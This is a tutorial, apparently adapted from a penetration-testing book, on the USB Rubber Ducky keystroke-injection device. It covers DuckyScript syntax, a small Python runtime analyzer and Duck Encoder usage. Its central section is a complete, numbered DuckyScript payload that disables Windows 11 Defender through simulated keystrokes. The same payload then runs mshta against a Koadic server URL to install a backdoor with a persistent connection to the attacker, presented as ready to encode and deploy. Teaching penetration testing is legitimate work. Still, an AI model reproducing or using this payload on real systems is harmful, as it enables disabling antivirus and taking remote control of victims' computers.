What Is USB Rubber Ducky?

With its USB Rubber Ducky, the Hak5 company created a quasi-standard for USB attacks of all kinds.

For this purpose, the company developed a simple scripting language and published a series of payloads on its website (https://github.com/hak5/usbrubberducky-payloads).

By now, the Ducky can be used with all operating systems. Primarily developed for administrators and penetration testers, the tool resembles a conventional USB flash drive from the outside. Due to the way it works, it could be called a programmable keyboard.

Structure and Functionality

The USB Rubber Ducky consists of an Atmel 60 MHz 32-bit processor, a JTAG interface for I/O operations, and a microSD card reader (see figure below). It can be used with the conventional USB 2.0 port on almost all devices and emulates a keyboard in the process. In addition, the USB Rubber Ducky is equipped with a push button and an LED.

USB Rubber Ducky with microSD Card

The device is thus designed exclusively for keystroke injection attacks and quickly captured the imagination of penetration testers and developers. The simple scripting language contributed greatly to its success: payloads can be created in just a few minutes. It’s therefore not surprising that the open-source community has already created many scripts and sample applications that only need to be adapted to your own circumstances.

DuckyScript

The Rubber Ducky is programmed in the DuckyScript language. The following list summarizes the most important elements of the language and demonstrates their use with simple examples:

REM

REM marks comments.

WINDOWS or GUI

These two commands simulate pressing the Windows key, the Cmd key on macOS, or the Super key on Linux. You can pass a single character or a string as a parameter:

REM Call Spotlight search in macOS
GUI SPACE

REM Open Run dialog in Windows
WINDOWS r

REM Open Windows settings
WINDOWS i

REM Open Windows context menu of the Start menu
WINDOWS X

DELAY

DELAY forces a pause before the next command is executed. This is recommended to give the target system time to process a command. You specify the time in milliseconds.

Alternatively, you can use DEFAULT_DELAY or DEFAULTDELAY to insert a delay between every command in the script. It must be declared at the beginning of the script:

REM Wait 5 seconds to load file
DELAY 5000

REM Always wait 200 ms until next command
DEFAULT_DELAY 200

STRING

STRING simulates the keyboard input of a string in the system:

REM Start macOS Spotlight search
GUI SPACE
REM Open settings for internet accounts
STRING Internet accounts

REM Open Windows command prompt window
WINDOWS
STRING cmd.exe
ENTER

MENU or APP

These two commands simulate pressing the menu or application key on Windows. Alternatively, the Shift+F10 combination would also work here:

REM Open WordPad and paste text from clipboard
GUI r
STRING wordpad
ENTER
MENU
STRING E

SHIFT, ALT, and CTRL or CONTROL

These commands simulate the corresponding control keys. They are often used in combination with other keys. For example, DuckyScript allows the following combinations:

– SHIFT with DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB
– ALT with END, ESC, ESCAPE, F1 to F12, SPACE, TAB, or with a single letter or character
– CTRL with BREAK, PAUSE, F1 to F12, ESCAPE, ESC, or with a single character

For example:

REM Exit active application
ALT F4

REM Open Windows Task Manager
CTRL SHIFT ESC

REM Open Linux terminal on Ubuntu
CTRL ALT T

REM Run Mission Control in macOS
ALT F3

REPEAT

REPEAT repeats the previous command n times:

REM Arrow key 5 times to the right and then 3 times
REM down; press Enter
RIGHT
REPEAT 4
DOWN
REPEAT 2
ENTER

Additional Commands

Depending on the operating system and the keyboard driver used, additional commands are available whose meaning largely corresponds to the key labels on the keyboard. These include BREAK or PAUSE, CAPSLOCK, DELETE, ESC or ESCAPE, HOME, INSERT, NUMLOCK, PAGEUP, PAGEDOWN, PRINTSCREEN, SCROLLLOCK, SPACE, and TAB.

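To see how these elements fit together, here is a small Python analyzer added for this article (it is not Hak5 code and not the Duck Encoder) that expands REPEAT, applies DEFAULT_DELAY and estimates a script’s runtime; the 10 ms per keystroke and the rule that DEFAULT_DELAY follows every non-delay command are assumptions, not Hak5 specifications. Such a check is useful when reviewing a script before it is encoded, or when examining one recovered from a device.

```python
"""Small DuckyScript analyzer (added example, not Hak5 code): expands REPEAT,
applies DEFAULT_DELAY and estimates how long a payload keeps the emulated
keyboard busy, which is handy when reviewing a script found on a device."""

def parse(script):
    """Return (COMMAND, argument) pairs; REM lines dropped, REPEAT expanded."""
    cmds = []
    for line in (raw.strip() for raw in script.splitlines()):
        if not line or line.upper().startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "REPEAT":
            if not cmds:
                raise ValueError("REPEAT needs a previous command")
            cmds.extend([cmds[-1]] * int(arg))  # repeat previous command n times
        else:
            cmds.append((cmd.upper(), arg))
    return cmds


def estimate_ms(script, keystroke_ms=10):
    """Sum DELAY values, add DEFAULT_DELAY after every other command and an
    assumed per-keystroke cost (10 ms is a guess); STRING costs one per char."""
    default = total = 0
    for cmd, arg in parse(script):
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default = int(arg)          # applies to all following commands
        elif cmd == "DELAY":
            total += int(arg)
        else:
            keys = len(arg) if cmd == "STRING" else 1
            total += keys * keystroke_ms + default
    return total


# Constructed sample: the REPEAT example above with a default delay added.
SAMPLE = """REM Arrow key 5 times to the right and then 3 times down
DEFAULT_DELAY 200
DELAY 1000
RIGHT
REPEAT 4
DOWN
REPEAT 2
ENTER"""

if __name__ == "__main__":
    for entry in parse(SAMPLE):
        print(*entry)
    print("estimated runtime:", estimate_ms(SAMPLE), "ms")
```
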
Installing a Backdoor on Windows 11

As mentioned, there are a large number of ready-made scripts that you just need to customize. To help you create your first DuckyScript, we’ve devised the following scenario that will allow you to bypass Windows 11 antivirus protection (Windows Defender) and then install a backdoor on the PC. In addition to operating systems, Microsoft is also constantly developing virus and threat protection. The attackers’ goal is therefore to disable or at least bypass this functionality—for example, with the help of PowerShell. This is now no longer so easily possible in the latest versions of Windows 10 and 11.

Although Microsoft was able to increase security in this case, the user still has the option to manually disable virus and threat protection for a certain period of time. We can take advantage of this by using the USB Rubber Ducky to simulate a user’s keystrokes for this operation. This allows us to later install a backdoor on the PC that ensures a permanent connection to the attacker.

For this particular case, we use Microsoft HTML Application Host, software that’s already on the Windows PC. We transfer the necessary HTA file with a simple command from the Koadic server. This attack technique, also called living off the land (LotL), is increasingly seen in cyberattacks. The goal here is to use trusted standard and system tools of operating systems for malicious purposes.

A script is stored on the Rubber Ducky, which you can edit using your favorite editor. In the following listing, the lines are numbered so that we can better explain the functions of the code. Do not include the numbers yourself! Now let’s look at the code:

1 REM Turn off Windows 11 Defender (Version 21H2)
2 REM Install Koadic-Backdoor
3 REM Author: Frank Neugebauer, Pentetstit.de
5 REM You take responsibility for any laws you break with this, I simply point out the security flaw
6 REM Let the HID enumerate
7 DEFAULT_DELAY 500
8 DELAY 2000
9 ESCAPE
10 CONTROL ESCAPE
11 STRING Windows security
12 ENTER
13 ENTER
14 TAB
15 TAB
16 TAB
17 TAB
18 ENTER
19 SPACE
20 CTRL-ALT TAB
21 ENTER
22 TAB
23 TAB
24 ENTER
25 TAB
26 SPACE
27 ALT F4
28 REM Install Koadic Backdoor
29 GUI r
30 STRING mshta http://192.168.171.110:9001/test123
31 ENTER

The command listed in line 7 allows you to “slow down” the Rubber Ducky a bit and give the target system some time to respond to the individual commands. If 500 ms isn’t sufficient, you can also enter a higher value.

The STRING command in line 11 helps you to quickly find the virus and threat protection settings in Windows 11. The subsequent commands simulate the user’s keystrokes to disable this functionality.

In lines 29 to 31, you establish the backdoor to the Windows PC. For this purpose, the URL http://192.168.171.110:9001/test123 is called on the target system using the mshta.exe file.

Stealing Passwords with the Rubber Ducky

To be able to recreate the attack under laboratory conditions, we placed the attacker and the target system in the same subnet. However, the attack could also take place across network boundaries under real conditions.

The figure below shows that the PC with IP address 192.168.171.111 has established a zombie connection to the Koadic server. In this case, we should forgive Koadic for not recognizing the Windows version correctly. Nevertheless, all Koadic modules can be used in the upcoming post-exploitation phase of penetration testing.

The Windows 11 PC Has Established a Zombie Connection to the Koadic Server

Use With Duck Encoder to Create the Finished Payload

If you think you can immediately use the script created in the previous section, we’re sorry to disappoint you. To use the DuckyScript script on the microSD card, it must first be encoded. For this purpose, the developers have provided the Java-based Duck Encoder (http://s-prs.co/v569665).

A summary of the syntax of this program is provided by the following command:

java -jar duckencoder.jar -h

Basically, you need to pass three parameters: in addition to the input and output files, you can also set the desired keyboard layout.

If you use a Linux system based on Ubuntu, you can immediately proceed with encoding the sample script. To do this, you need to run the following command:

java -jar duckencoder.jar -l us -i ducky_code.txt -o inject.bin

With this, you’ve selected a US keyboard layout, the sample script ducky_code.txt as the input file, and inject.bin as the output file.

You can also assign a different name to the output file. But it’s important that the file used later on the USB Rubber Ducky has this name.

If you don’t mind encoding your script over the internet, you can use an online variant of the Duck Encoder. The Duck Toolkit site at https://ducktoolkit.com provides a payload generator in addition to an online encoder (see figure below). Here you can select ready-made scripts for Linux and Windows in different categories.

Duck Toolkit as Online Variant of the Duck Encoder

Once the script has been encoded, it can be copied to the microSD card using the included card reader. Of course, you can keep multiple files there depending on the storage capacity. However, only the payload named inject.bin is executed, and it must be located in the root directory.

Editor’s note: This post has been adapted from a section of the book Hacking and Security: The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.
